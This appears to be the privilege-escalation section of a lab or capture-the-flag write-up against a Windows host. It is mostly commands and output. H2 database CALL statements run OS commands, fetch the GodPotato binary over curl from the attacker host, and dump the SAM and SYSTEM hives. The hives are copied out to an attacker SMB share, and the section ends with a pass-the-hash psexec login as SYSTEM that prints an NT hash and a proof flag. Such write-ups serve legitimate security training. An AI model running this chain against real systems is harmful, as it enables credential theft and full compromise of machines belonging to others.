Priv Esc
The interactive shell is too unreliable to work in, so the remaining commands are executed through the H2 database instead, via the `JNIScriptEngine_eval` alias below.
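-- H2 command-execution helper. CREATE ALIAS binds the SQL function
-- JNIScriptEngine_eval to the static Java method JNIScriptEngine.eval, which
-- must already be loadable by the H2 server (where that class comes from is
-- not shown on this page). IF NOT EXISTS makes the statement idempotent, so it
-- is declared once here rather than repeated before every CALL.
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";

-- Each CALL hands the engine a one-expression script that spawns a process via
-- Runtime.exec(String) and returns whatever it wrote to stdout (Scanner with
-- delimiter \Z = "read up to end of input").
-- Things to be aware of before reusing this pattern:
--   * exec(String) splits the command on whitespace and Java re-joins the
--     tokens for CreateProcess. The -cmd "..." quoting below survives only
--     because no single token contains a space; anything more involved should
--     use the String[] overload instead.
--   * Scanner.next() throws NoSuchElementException when the process printed
--     nothing to stdout -- the process has still run, so an H2 error here does
--     not mean the command failed. Each command is therefore run through
--     `cmd /c ... 2>&1` so stderr (curl's progress meter, reg.exe error text)
--     is returned with the result instead of being silently dropped.
--   * Nothing is logged on the attacker side; keep the returned text.

-- Token privileges of the account H2 runs as -- presumably to confirm
-- SeImpersonatePrivilege, which the GodPotato steps below depend on.
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c whoami /priv 2>&1").getInputStream()).useDelimiter("\\Z").next()');

-- Stage GodPotato from the attacker box (192.168.45.233) over plain HTTP into
-- C:\programdata (world-writable). The binary is a well-known artefact;
-- remove it once the engagement is done.
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c curl 192.168.45.233/GodPotato-NET4.exe -o C:\\programdata\\GodPotato-NET4.exe 2>&1").getInputStream()).useDelimiter("\\Z").next()');

-- Dump the SAM and SYSTEM hives. reg save HKLM\SAM needs rights the H2 service
-- account evidently lacks, so the command is launched through GodPotato to
-- obtain a SYSTEM token. SYSTEM is saved alongside SAM because secretsdump
-- (used later) needs it to decrypt the hashes. Both files hold every local
-- account's NT hash -- treat them as sensitive and delete them afterwards.
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c C:\\programdata\\GodPotato-NET4.exe -cmd \"reg.exe save HKLM\\SAM C:\\programdata\\sam.bak\" 2>&1").getInputStream()).useDelimiter("\\Z").next()');
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c C:\\programdata\\GodPotato-NET4.exe -cmd \"reg.exe save HKLM\\SYSTEM C:\\programdata\\system.bak\" 2>&1").getInputStream()).useDelimiter("\\Z").next()');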
# Anonymous SMB share on the attacker box that will receive the hives.
# Nothing on the wire is authenticated or encrypted: anyone on the path can
# read or replace the files. impacket-smbserver also accepts
# -username/-password; use them on a shared network (the net use on the
# target then needs matching /user:... credentials).
$ impacket-smbserver share share/ -smb2support
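-- Exfiltrate the two hives over SMB to the attacker's impacket-smbserver on
-- 192.168.45.233. IF NOT EXISTS makes re-declaring the alias a harmless no-op;
-- it is kept here only so this block can be pasted on its own.
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";

-- Every command runs through `cmd /c ... 2>&1` so stderr comes back in the
-- result; Scanner.next() would otherwise throw NoSuchElementException on a
-- command that prints nothing to stdout even though it has already executed.

-- Connect to the share without credentials (the server is anonymous). This
-- mapping belongs to the H2 process's logon session, whereas the copies below
-- run under the token GodPotato obtains -- they most likely succeed because
-- the share accepts anonymous access, not because of this mapping. TODO confirm.
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c net use \\\\192.168.45.233\\share 2>&1").getInputStream()).useDelimiter("\\Z").next()');

-- Copy the hives out, again wrapped in GodPotato (whether the H2 account could
-- have read the freshly written files directly is not shown here). The
-- transfer is clear-text SMB to an unauthenticated share, so the hashes are
-- readable by anyone on the path. Delete the .bak files and the GodPotato
-- binary from C:\programdata when finished.
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c C:\\programdata\\GodPotato-NET4.exe -cmd \"cmd /c copy C:\\programdata\\system.bak \\\\192.168.45.233\\share\" 2>&1").getInputStream()).useDelimiter("\\Z").next()');
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c C:\\programdata\\GodPotato-NET4.exe -cmd \"cmd /c copy C:\\programdata\\sam.bak \\\\192.168.45.233\\share\" 2>&1").getInputStream()).useDelimiter("\\Z").next()');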
# Offline extraction of the local account hashes from the two hives pulled
# off the box; SYSTEM supplies the key needed to decrypt the SAM entries.
$ impacket-secretsdump -sam sam.bak -system system.bak local
# Pass-the-hash as the local Administrator. The value after ':' is the NT
# hash; the empty LM half is intentional. Note psexec is noisy: as the output
# below shows it uploads a random-named executable to ADMIN$ and creates and
# starts a service, leaving a service-install event and a dropped binary on
# the target -- plan cleanup accordingly.
$ impacket-psexec Administrator@192.168.241.66 -hashes :63f4402373a85ea2606ebbe11d871d27
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra
[*] Requesting shares on 192.168.241.66.....
[*] Found writable share ADMIN$
[*] Uploading file inNgTHUe.exe
[*] Opening SVCManager on 192.168.241.66.....
[*] Creating service SZvD on 192.168.241.66.....
[*] Starting service SZvD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\proof.txt
9c14b341d21d5489d6ef0f16c1bf51e3
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.241.66
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.241.254